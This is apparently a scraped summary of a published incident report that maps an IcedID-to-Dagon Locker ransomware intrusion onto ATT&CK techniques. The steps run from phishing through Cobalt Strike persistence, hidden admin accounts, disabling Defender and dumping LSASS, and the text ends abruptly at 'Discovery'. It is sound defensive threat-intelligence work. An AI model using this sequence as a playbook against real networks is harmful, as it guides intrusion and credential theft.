DFIR Summary
https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/
Initial Access
T1566 / Phishing
An email is sent containing a link that redirects them to a malicious page, which eventually downloads a malicious JS file.
Execution
T1027.010 / Obfuscated Files or Information: Command Obfuscation
The JS file was obfuscated
Execution
T1204.002 / User Execution: Malicious File
The user executes the malicious JS file.
Execution
T1059.007 / Command and Scripting Interpreter: JavaScript
Code execution is done through ActiveX in JS
Execution
T1105 / Ingress Tool Transfer
The JS file downloads IcedID payload from an externally hosted server
Execution
T1059.003 / Command and Scripting Interpreter: Windows Command Shell
The JS file calls cmd.exe to execute other commands
Execution
T1218.011 / System Binary Proxy Execution: Rundll32
The JS file calls rundll32.exe to execute the IcedID payload
Execution
T1055 / Process Injection
svchost.exe is spawned, and IceID is injection into it
Execution
T1070.004 / Indicator Removal: File Deletion
The IcedID configuration file was deleted
Execution
T1059.001 / Command and Scripting Interpreter: PowerShell
Powershell was used to execute commands
Execution
T1105 / Ingress Tool Transfer
A Cobalt Strike beacon was downloaded onto the victim host
Execution
T1055 / Process Injection
Through Cobalt Strike, another Cobalt Strike beacon was injected into a running process
Persistence
T1053.005 / Scheduled Task/Job: Scheduled Task
A scheduled task was created for persistence. The scheduled task would download and execute the Cobalt strike beacon when executed.
Persistence
T1484.001 / Domain or Tenant Policy Modification: Group Policy Modification
On a domain controller, the threat actor created a bat file under the local group policy directory. Now when users login, they will download and execute the Cobalt Strike beacon, giving the attacker access to all machines.
Persistence
T1133 / External Remote Services
The attacker installed AnyDesk onto the victim machines for remote access
Persistence
T1136.001 / Create Account: Local Account
The attacker created a local account
Persistence
T1098 / Account Manipulation
The attacker added the local account to the administrator group
Persistence
T1564.002 / Hide Artifacts: Hidden Users
The attacker hides the account from view by writing a value to registry in SepcialAccounts\UserList
Privilege Escalation
T1068 / Exploitation for Privilege Escalation
The attacker used named pipes for escalate privileges from Administrator to SYSTEM
Defensive Evasion
T1562.004 / Impair Defenses: Disable or Modify System Firewall
The attacker modifies the firewall state
Defensive Evasion
T1562.001 / Impair Defenses: Disable or Modify Tools
The attacker disables Real Time Monitoring in Microsoft Defender
Credential Access
T1003.001 / OS Credential Dumping: LSASS Memory
Mimikatz was used to dump LSASS for password access
Credential Access
T1552.001 / Unsecured Credentials: Credentials In Files
The attacker tries to find credentials that are stored in files on the system
Discovery
Last updated